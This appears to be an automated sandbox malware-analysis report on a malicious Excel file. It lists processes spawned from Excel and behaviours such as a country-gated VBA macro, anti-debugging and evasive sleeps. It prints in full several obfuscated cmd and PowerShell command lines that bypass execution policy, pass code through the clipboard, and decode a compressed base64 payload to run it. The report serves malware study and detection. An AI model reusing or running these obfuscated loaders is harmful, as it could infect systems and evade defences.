Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\clip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\clip.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion:

barindex
Document contains an embedded VBA which only executes on specific systems (country or language check)Show sources
Source: 20310_011_11353_0_88.xlsStream path '_VBA_PROJECT_CUR/VBA/ThisWorkbook' : Open()If Application.International(xlCountrySetting) = 39 T
Contains long sleeps (>= 3 min)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Enumerates the file systemShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
May sleep (evasive loops) to hinder dynamic analysisShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1348Thread sleep time: -120000s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2044Thread sleep time: -922337203685477s >= -30000sJump to behavior
Queries a list of all running processesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging:

barindex
Checks for kernel debuggers (NtQuerySystemInformation(SystemKernelDebuggerInformation))Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSystem information queried: KernelDebuggerInformationJump to behavior
Enables debug privilegesShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Creates guard pages, often used to prevent reverse engineering and debuggingShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory allocated: page read and write | page guardJump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
Creates a process in suspended mode (likely to inject code)Show sources
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /C %QJi:''='%Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\clip.exe cLiPJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)Show sources
Source: unknownProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'nt
Source: unknownProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'
Source: unknownProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\cmd.exe CmD /V:ON/C 'set 7T=oMPResSIoNmODe]::''D`EcO`Mpr`&&set fXO9=`m`pR&&set lM='Uauer5J/QU&&set OJo=3rTzG&&set J3=t',(\''{0}&&set du4k=jNexb&&set xCZA=Ii'') } ^^^^^^^^&&set dq=IUjPSU&&set PF=qQeg9FrB&&set 7w=''&&set 54K=\''( )) ) ; [Sy&&set Jx19=UsJo7','4d7&&set 6jA=`&&set q3FQ=-nO&&set wFhV=keacV&&set Op=0}\'' -&&set FI=8}{6}&&set p5=r`eadt&&set a3=Rd3b1&&set MZ=`Home}[&&set 3mr=f 'dd-T',&&set KGUu=pZragUZRw9kIMJM','nf6yvfeRHwys&&set g9R=DDTwyngbQW6fTbNBM9T6eN3+Vxy'&&set sGDZ=FOv&&set 34f=SSiO&&set 3kP=UNemw2mO&&set M76=SUw2&&set jvc=i6Wr0yJa+CgVQ64wlYgUsz&&set qXy=VB&&set 87kx=oJOLevLKG&&set mti=6&&set md=NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5&&set W39h=11Hy&&set fQN=oM2&&set Igd=-f'yp','e',( \''{1}{&&set qK=Ro5A5SnpE3C/') &&set vJIZ=oBjECT') &&set Vkgt=ki6','U+ZEre4WJW&&set AXSR=','R','eaCH') {.(''{0}{1}{2}''-f 'n&&set ksNm=SMUVYAd&&set dn=ld0v',&&set M3hU=stem.Windows&&set kmP='k',&&set 6x=FFQB2enJqIYc&&set 6In=IBG','&&set KcOP=)&&set wpf='A' ) ) -As ( \''{3}{1}{0}{4}{2}\'' -f 'ntJump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /S /D /c' EcHO/^&( ${pS`h`OmE}[4]+${PS`Home}[34]+'x')( .('{1}{0}{2}'-f 'oB','neW-','jECT') IO.CO`m`pRE`sSION`.`deFL`AteSTrE`AM( [SYStem.io.MEMorYSTREam][sYStem.COnverT]::'F`R`o`MBAse`64StrinG'(('{22}{44}{11}{0}{47}{33}{30}{1}{34}{50}{4}{46}{31}{18}{6}{32}{26}{38}{41}{15}{13}{27}{48}{16}{36}{39}{49}{7}{51}{5}{20}{8}{3}{23}{17}{35}{14}{25}{21}{28}{37}{40}{12}{24}{2}{42}{19}{45}{43}{29}{9}{10}' -f 't2pO','xL1w032cbzqQeg9FrBc','nzXT87T7FoIHLWcpf8','+BLdfsM1zSOIOn','bEld0v','SISLxsB+i0VNzgIu9Pt7eBk+sR8Ei7goBMSUw2hCdAfH4pl9','k','K5AY3vQIdfy+fA3bUz/PhrPc+BeNlKIqoxmnaJFAmCFN0OlKbye8RGJGLLoPE1NAYbUP7/Ckr6Xm50gK6GznraOgpWOzyzU/Op5BwJ','sjp6c11','PFd/L/Ubl5RXjtuuTLR','0Lv6Lw==','1KqmjrC1UVHbxna2Y4/jv190zgJ51H4Bmpl+efrqnAUABd+h0nPdJvf7SHLdXzlH5AiqodnkybHbbbrHQbYcFAGfmhTt/WAKoZjvt5XsB/HYzfPUPs5JaAFW','5T8EDISyqRylxGVJpP643rTzGRN3RKBBV9ZXsjbAx8rLFmNS1blIorpYOOdplN65rKj9HhxiqChyuKIYQSiCGLkcB','UGUi6LRcf487TKv0QauRlD9be1uKluCbCLFi5BuJ7+F','xvUjxSnmSUbRKm/4PD4PQzEJFZG'Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cMd /C poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poweRSHeLl -w 1 -nopR -sta -ExEcUtiONPoL BYPaSS -NOnI -nOL . ( \'{2}{0}{1}\' -f'yp','e',( \'{1}{0}\' -f 'dd-T','A' ) ) -As ( \'{3}{1}{0}{4}{2}\' -f 'nta','ese',( \'{2}{0}{1}\'-f 'o','re','ionC'),'Pr','t' );. ( ${vErb`o`sE`P`REf`ereNce}.( \'{1}{2}{0}\' -f 'InG','TOS','Tr').\'IN`VOkE\'( )[1,3] + 'x'-JoiN'' )( ( [SYstem.winDoWS.CLiPboaRd]::( \'{0}{1}\' -f'g',( \'{2}{0}{1}\' -f 'eX','t','eTt' )).\'i`N`VoKe\'( )) ) ; [System.Windows.Clipboard]::(\'{2}{0}{1}\' -f 'et',(\'{0}{1}\' -f 'T','ext' ),'S').\'inVO`kE\'(' ' )Jump to behavior

Language, Device and Operating System Detection:

barindex
Queries the installation date of WindowsShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
Queries the volume information (name, serial number etc) of a deviceShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC_32\System.Transactions\2.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
